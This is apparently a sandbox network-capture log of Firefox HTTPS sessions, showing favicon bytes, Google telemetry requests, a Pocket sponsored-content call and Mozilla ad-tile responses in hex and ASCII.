2024-07-26 18:10:45 UTC	704	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 26 Jul 2024 18:04:45 GMT Expires: Sat, 03 Aug 2024 18:04:45 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 360 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 18:10:45 UTC	686	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-07-26 18:10:45 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a eb Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
2024-07-26 18:10:45 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff fc Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-07-26 18:10:45 UTC	1390	IN	Data Raw: f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBF!4I
2024-07-26 18:10:45 UTC	574	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	64141	172.217.23.110	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:45 UTC	518	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Referer: https://accounts.google.com/ Origin: https://accounts.google.com Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site
2024-07-26 18:10:45 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:45 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	64139	172.217.16.206	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:45 UTC	518	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Referer: https://accounts.google.com/ Origin: https://accounts.google.com Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site
2024-07-26 18:10:46 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:45 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	64138	172.217.16.206	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:45 UTC	533	OUT	POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://accounts.google.com/ X-Goog-AuthUser: 0 Content-Type: application/x-www-form-urlencoded;charset=utf-8 Content-Length: 398 Origin: https://accounts.google.com Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site
2024-07-26 18:10:45 UTC	398	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 32 32 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 32 32 30 31 37 34 34 33 39 38 35 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 5b 5b 5b 5c 22 2f 63 6c 69 65 6e 74 5f 73 74 72 65 61 6d 7a 2f 62 67 2f 66 69 6c 5c 22 2c 6e 75 6c 6c 2c 5b 5c 22 72 6b 5c 22 2c 5c 22 6b 65 5c 22 5d 2c 5b 5b 5b 5b 5c 22 50 76 37 52 6c 63 5c 22 5d 2c 5b 5c 22 5f 5c 22 5d 5d 2c 5b 6e 75 6c 6c 2c 37 37 33 5d 5d 5d 5d 2c 5b 5c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"22",null,null,[1,0,0,0,0]]],1828,[["1722017443985",null,null,null,null,null,null,"[[[\"/client_streamz/bg/fil\",null,[\"rk\",\"ke\"],[[[[\"Pv7Rlc\"],[\"_\"]],[null,773]]]],[\
2024-07-26 18:10:46 UTC	925	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=516=eL5FTI02a5i0scJVcv3hXr1ZJj5zg0n_m7EIsG-6_eFB9CNnleLYdE-J5q2_yBZr5g5Zz1tlE16A3C6NSHwMdr_mwEAZZzOs05ttJduSNXYUIC56jhpbQYK34SWcmhNeAPxH_FooI4_0yfryCrWCIeBYlmI2jYzOf93PMruD2fI; expires=Sat, 25-Jan-2025 18:10:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:46 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 26 Jul 2024 18:10:46 GMT Connection: close Transfer-Encoding: chunked
2024-07-26 18:10:46 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-07-26 18:10:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	64150	34.117.188.166	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:49 UTC	304	OUT	POST /spocs HTTP/1.1 Host: spocs.getpocket.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-type: application/json Content-Length: 197 Connection: keep-alive
2024-07-26 18:10:49 UTC	197	OUT	Data Raw: 7b 22 70 6f 63 6b 65 74 5f 69 64 22 3a 22 7b 63 39 37 31 66 39 32 36 2d 36 35 36 63 2d 34 65 66 65 2d 38 63 30 61 2d 39 35 63 66 38 66 36 31 64 65 33 65 7d 22 2c 22 76 65 72 73 69 6f 6e 22 3a 32 2c 22 63 6f 6e 73 75 6d 65 72 5f 6b 65 79 22 3a 22 34 30 32 34 39 2d 65 38 38 63 34 30 31 65 31 62 31 66 32 32 34 32 64 39 65 34 34 31 63 34 22 2c 22 70 6c 61 63 65 6d 65 6e 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 70 6f 6e 73 6f 72 65 64 2d 74 6f 70 73 69 74 65 73 22 2c 22 61 64 5f 74 79 70 65 73 22 3a 5b 33 31 32 30 5d 2c 22 7a 6f 6e 65 5f 69 64 73 22 3a 5b 32 38 30 31 34 33 5d 7d 5d 7d Data Ascii: {"pocket_id":"{c971f926-656c-4efe-8c0a-95cf8f61de3e}","version":2,"consumer_key":"40249-e88c401e1b1f2242d9e441c4","placements":[{"name":"sponsored-topsites","ad_types":[3120],"zone_ids":[280143]}]}
2024-07-26 18:10:49 UTC	203	IN	HTTP/1.1 200 OK content-type: application/json date: Fri, 26 Jul 2024 18:10:49 GMT Content-Length: 1168 via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 18:10:49 UTC	1168	IN	Data Raw: 7b 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 66 65 61 74 75 72 65 5f 66 6c 61 67 73 22 3a 7b 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 2c 22 73 70 6f 63 5f 76 32 22 3a 74 72 75 65 7d 2c 22 73 70 6f 63 73 50 65 72 4e 65 77 54 61 62 73 22 3a 31 2c 22 64 6f 6d 61 69 6e 41 66 66 69 6e 69 74 79 50 61 72 61 6d 65 74 65 72 53 65 74 73 22 3a 7b 22 64 65 66 61 75 6c 74 22 3a 7b 22 63 6f 6d 62 69 6e 65 64 44 6f 6d 61 69 6e 46 61 63 74 6f 72 22 3a 30 2e 35 2c 22 66 72 65 71 75 65 6e 63 79 46 61 63 74 6f 72 22 3a 30 2e 35 2c 22 69 74 65 6d 53 63 6f 72 65 46 61 63 74 6f 72 22 3a 31 2c 22 6d 75 6c 74 69 44 6f 6d 61 69 6e 42 6f 6f 73 74 22 3a 30 2c 22 70 65 72 66 65 63 74 43 6f 6d 62 69 6e 65 64 44 6f 6d 61 69 6e 53 63 6f 72 65 22 3a 32 2c 22 70 65 72 66 65 Data Ascii: {"settings":{"feature_flags":{"collections":false,"spoc_v2":true},"spocsPerNewTabs":1,"domainAffinityParameterSets":{"default":{"combinedDomainFactor":0.5,"frequencyFactor":0.5,"itemScoreFactor":1,"multiDomainBoost":0,"perfectCombinedDomainScore":2,"perfe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	64148	34.117.188.166	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:49 UTC	262	OUT	GET /v1/tiles HTTP/1.1 Host: contile.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:10:49 UTC	268	IN	HTTP/1.1 200 OK cache-control: private, max-age=586, stale-if-error=10719 content-type: application/json date: Fri, 26 Jul 2024 18:10:49 GMT via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close Transfer-Encoding: chunked
2024-07-26 18:10:49 UTC	1122	IN	Data Raw: 32 30 32 65 0d 0a 7b 22 74 69 6c 65 73 22 3a 5b 7b 22 69 64 22 3a 37 34 33 30 31 2c 22 6e 61 6d 65 22 3a 22 41 6d 61 7a 6f 6e 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 3f 74 61 67 3d 61 64 6d 61 72 6b 65 74 75 73 2d 32 30 5c 75 30 30 32 36 72 65 66 3d 70 64 5f 73 6c 5f 34 37 65 63 34 38 38 39 35 39 39 64 34 34 62 31 33 37 61 65 36 38 63 33 63 65 34 66 32 37 30 39 33 31 63 34 63 35 31 32 64 37 62 31 38 36 30 38 37 63 63 64 64 63 37 36 5c 75 30 30 32 36 6d 66 61 64 69 64 3d 61 64 6d 22 2c 22 63 6c 69 63 6b 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 72 69 64 67 65 2e 73 66 6f 31 2e 61 70 30 31 2e 6e 65 74 2f 63 74 70 3f 76 65 72 73 69 6f 6e 3d 31 2e 30 2e 30 5c 75 30 30 32 36 65 6e 63 70 3d 48 46 33 Data Ascii: 202e{"tiles":[{"id":74301,"name":"Amazon","url":"https://www.amazon.com/?tag=admarketus-20\u0026ref=pd_sl_47ec4889599d44b137ae68c3ce4f270931c4c512d7b186087ccddc76\u0026mfadid=adm","click_url":"https://bridge.sfo1.ap01.net/ctp?version=1.0.0\u0026encp=HF3
2024-07-26 18:10:49 UTC	1390	IN	Data Raw: 78 72 65 4e 6a 46 33 6d 69 46 32 7a 34 51 4c 59 66 42 49 71 78 72 65 76 4a 6d 77 71 67 43 6c 58 31 43 6c 6e 48 46 33 5a 4a 25 33 44 77 71 67 43 78 64 66 51 4c 59 31 70 38 64 34 5a 48 5a 66 5a 48 64 66 5a 66 6d 37 6e 45 55 45 45 37 66 67 44 58 38 32 43 34 6e 45 77 33 25 32 46 31 63 78 6d 4a 52 63 35 45 71 58 5a 49 44 5f 33 6a 70 65 35 32 77 49 25 33 44 45 51 37 6b 45 52 25 32 46 64 45 6b 6a 52 4a 71 45 63 78 70 65 31 6a 6b 75 50 43 59 44 59 32 71 33 63 31 46 75 44 48 47 4e 6d 69 72 44 58 48 51 38 5a 49 6c 75 65 73 44 5f 6f 34 77 71 5a 48 43 44 6d 4a 39 76 66 31 47 38 59 34 45 4e 55 46 39 37 42 6a 77 63 5f 6a 77 4e 35 33 39 44 77 66 71 49 4e 46 77 37 53 66 25 33 44 66 5f 6a 39 78 5a 4a 45 45 75 66 59 44 59 32 52 45 72 78 70 77 6c 6a 47 49 39 44 52 6a 71 69 Data Ascii: xreNjF3miF2z4QLYfBIqxrevJmwqgClX1ClnHF3ZJ%3DwqgCxdfQLY1p8d4ZHZfZHdfZfm7nEUEE7fgDX82C4nEw3%2F1cxmJRc5EqXZID_3jpe52wI%3DEQ7kER%2FdEkjRJqEcxpe1jkuPCYDY2q3c1FuDHGNmirDXHQ8ZIluesD_o4wqZHCDmJ9vf1G8Y4ENUF97Bjwc_jwN539DwfqINFw7Sf%3Df_j9xZJEEufYDY2RErxpwljGI9DRjqi
2024-07-26 18:10:49 UTC	1390	IN	Data Raw: 2e 76 31 2e 77 31 5c 75 30 30 32 36 6d 66 61 64 69 64 3d 61 64 6d 22 2c 22 63 6c 69 63 6b 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 72 69 64 67 65 2e 73 66 6f 31 2e 61 64 6d 61 72 6b 65 74 70 6c 61 63 65 2e 6e 65 74 2f 63 74 70 3f 76 65 72 73 69 6f 6e 3d 31 2e 30 2e 30 5c 75 30 30 32 36 65 6e 63 70 3d 48 46 33 76 49 70 6b 59 37 52 63 64 6a 70 6b 58 34 5a 38 59 66 70 6c 6d 66 70 38 6b 66 5a 38 6d 37 6e 63 71 6a 6e 61 7a 37 6e 49 5a 67 47 65 59 4a 6d 32 75 48 46 33 77 4a 6e 6a 76 4a 6e 44 75 66 70 71 55 78 6d 49 56 66 42 49 6b 78 5a 64 57 78 6e 7a 71 35 46 63 71 49 46 5f 52 69 46 5f 77 35 43 62 5f 35 52 34 6e 4a 5a 6c 6e 4a 72 37 52 69 72 78 7a 6a 25 33 44 77 54 49 47 34 57 37 6e 37 76 49 25 33 44 33 77 78 77 65 4e 78 6e 63 75 78 5a 64 31 73 77 45 5f Data Ascii: .v1.w1\u0026mfadid=adm","click_url":"https://bridge.sfo1.admarketplace.net/ctp?version=1.0.0\u0026encp=HF3vIpkY7RcdjpkX4Z8Yfplmfp8kfZ8m7ncqjnaz7nIZgGeYJm2uHF3wJnjvJnDufpqUxmIVfBIkxZdWxnzq5FcqIF_RiF_w5Cb_5R4nJZlnJr7Rirxzj%3DwTIG4W7n7vI%3D3wxweNxncuxZd1swE_
2024-07-26 18:10:49 UTC	1390	IN	Data Raw: 51 62 57 35 70 78 6b 31 43 38 64 35 70 38 58 31 43 4c 6d 34 59 57 58 34 43 32 58 34 5a 6c 59 34 42 57 57 35 70 6c 59 34 5a 71 58 35 70 6c 57 66 43 32 58 35 25 33 44 5f 77 6a 72 33 4e 48 4f 57 54 35 39 33 76 4a 25 33 44 45 5a 78 74 58 4f 48 46 34 6f 49 6e 77 54 4a 63 7a 51 4a 6d 5f 71 6a 46 34 76 6a 6e 44 79 5c 75 30 30 32 36 63 74 61 67 3d 37 35 32 38 32 38 32 35 36 30 38 31 37 31 35 32 30 22 2c 22 69 6d 61 67 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 69 6c 65 73 2d 63 64 6e 2e 70 72 6f 64 2e 61 64 73 2e 70 72 6f 64 2e 77 65 62 73 65 72 76 69 63 65 73 2e 6d 6f 7a 67 63 70 2e 6e 65 74 2f 6d 36 42 76 47 36 52 63 6e 74 6d 61 66 65 6d 32 62 4c 66 41 35 49 6b 74 4b 6d 31 53 45 77 71 4f 32 45 34 58 49 6a 61 43 31 32 63 3d 2e 31 30 38 36 32 2e 6a 70 67 Data Ascii: QbW5pxk1C8d5p8X1CLm4YWX4C2X4ZlY4BWW5plY4ZqX5plWfC2X5%3D_wjr3NHOWT593vJ%3DEZxtXOHF4oInwTJczQJm_qjF4vjnDy\u0026ctag=75282825608171520","image_url":"https://tiles-cdn.prod.ads.prod.webservices.mozgcp.net/m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.10862.jpg
2024-07-26 18:10:49 UTC	1390	IN	Data Raw: 55 78 6d 49 56 66 42 49 6b 78 5a 64 57 78 6e 7a 71 35 46 63 71 49 46 5f 52 69 46 5f 77 35 43 62 5f 35 52 34 6e 4a 5a 6c 6e 4a 72 37 52 69 72 78 7a 6a 25 33 44 77 54 49 47 34 57 37 6e 37 76 49 25 33 44 33 77 78 77 65 4e 78 6e 63 75 78 5a 64 31 73 77 45 5f 43 6b 33 37 34 6c 64 53 45 43 37 34 33 25 33 44 6a 61 43 52 76 63 66 44 64 53 32 42 49 75 78 72 32 7a 6a 25 33 44 77 54 49 47 34 57 37 52 37 6b 78 25 33 44 77 71 67 47 34 6e 47 5a 37 77 31 70 62 6d 34 43 65 4e 34 43 37 71 34 51 44 72 34 70 45 71 48 6d 66 57 49 51 78 64 66 43 4c 61 34 5a 32 6d 66 70 38 6b 47 6d 32 6d 66 51 32 6b 34 51 48 61 34 51 71 58 66 5a 66 64 31 70 49 51 49 46 66 72 34 5a 78 6b 48 6e 38 6b 48 51 49 51 34 51 44 72 37 52 65 4f 67 43 6c 55 66 74 49 57 6a 47 66 59 69 43 6b 58 66 70 6c 6e Data Ascii: UxmIVfBIkxZdWxnzq5FcqIF_RiF_w5Cb_5R4nJZlnJr7Rirxzj%3DwTIG4W7n7vI%3D3wxweNxncuxZd1swE_Ck374ldSEC743%3DjaCRvcfDdS2BIuxr2zj%3DwTIG4W7R7kx%3DwqgG4nGZ7w1pbm4CeN4C7q4QDr4pEqHmfWIQxdfCLa4Z2mfp8kGm2mfQ2k4QHa4QqXfZfd1pIQIFfr4ZxkHn8kHQIQ4QDr7ReOgClUftIWjGfYiCkXfpln
2024-07-26 18:10:49 UTC	1390	IN	Data Raw: 6c 49 54 4a 6c 49 69 43 6d 32 58 43 46 49 4e 44 6c 5f 4e 43 6d 48 58 69 47 33 25 33 44 42 6c 58 56 37 43 37 74 48 71 7a 32 49 46 75 52 43 52 65 4f 33 6b 58 39 66 6c 33 35 32 5a 37 39 43 6d 7a 25 32 46 49 6e 64 36 66 46 66 72 31 6c 7a 75 73 43 33 66 66 25 33 44 64 4f 49 70 6a 45 33 51 6c 77 66 71 49 63 37 43 37 74 42 6c 7a 48 73 52 37 52 32 6e 77 6e 34 64 6a 72 73 70 45 25 32 46 48 72 49 63 66 43 63 46 42 77 33 32 78 47 65 4f 42 47 33 33 69 25 33 44 64 25 33 44 6a 44 33 32 6a 43 6a 50 33 5a 77 77 4a 43 66 61 42 6e 75 65 34 46 6a 52 48 72 65 6d 46 6e 32 61 4a 39 76 54 34 52 33 4f 78 25 33 44 45 42 43 47 4c 57 49 47 38 77 66 71 49 4f 43 63 49 37 44 72 4c 5f 78 44 71 57 66 72 49 71 44 46 34 31 73 43 71 77 66 71 48 77 66 71 37 65 4a 4f 44 59 33 6e 6b 58 69 64 Data Ascii: lITJlIiCm2XCFINDl_NCmHXiG3%3DBlXV7C7tHqz2IFuRCReO3kX9fl352Z79Cmz%2FInd6fFfr1lzusC3ff%3DdOIpjE3QlwfqIc7C7tBlzHsR7R2nwn4djrspE%2FHrIcfCcFBw32xGeOBG33i%3Dd%3DjD32jCjP3ZwwJCfaBnue4FjRHremFn2aJ9vT4R3Ox%3DEBCGLWIG8wfqIOCcI7DrL_xDqWfrIqDF41sCqwfqHwfq7eJODY3nkXid
2024-07-26 18:10:49 UTC	179	IN	Data Raw: 7a 49 69 77 69 63 47 56 79 59 32 56 75 64 47 46 6e 5a 53 49 36 4d 54 42 39 58 58 30 73 65 79 4a 77 62 33 4e 70 64 47 6c 76 62 69 49 36 4d 79 77 69 59 57 78 73 62 32 4e 68 64 47 6c 76 62 69 49 36 57 33 73 69 63 47 46 79 64 47 35 6c 63 69 49 36 49 6d 46 74 63 43 49 73 49 6e 42 6c 63 6d 4e 6c 62 6e 52 68 5a 32 55 69 4f 6a 45 77 4d 48 30 73 65 79 4a 77 59 58 4a 30 62 6d 56 79 49 6a 6f 69 62 57 39 36 4c 58 4e 68 62 47 56 7a 49 69 77 69 63 47 56 79 59 32 56 75 64 47 46 6e 5a 53 49 36 4d 48 31 64 66 56 31 39 22 7d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: zIiwicGVyY2VudGFnZSI6MTB9XX0seyJwb3NpdGlvbiI6MywiYWxsb2NhdGlvbiI6W3sicGFydG5lciI6ImFtcCIsInBlcmNlbnRhZ2UiOjEwMH0seyJwYXJ0bmVyIjoibW96LXNhbGVzIiwicGVyY2VudGFnZSI6MH1dfV19"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	64149	35.244.181.201	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
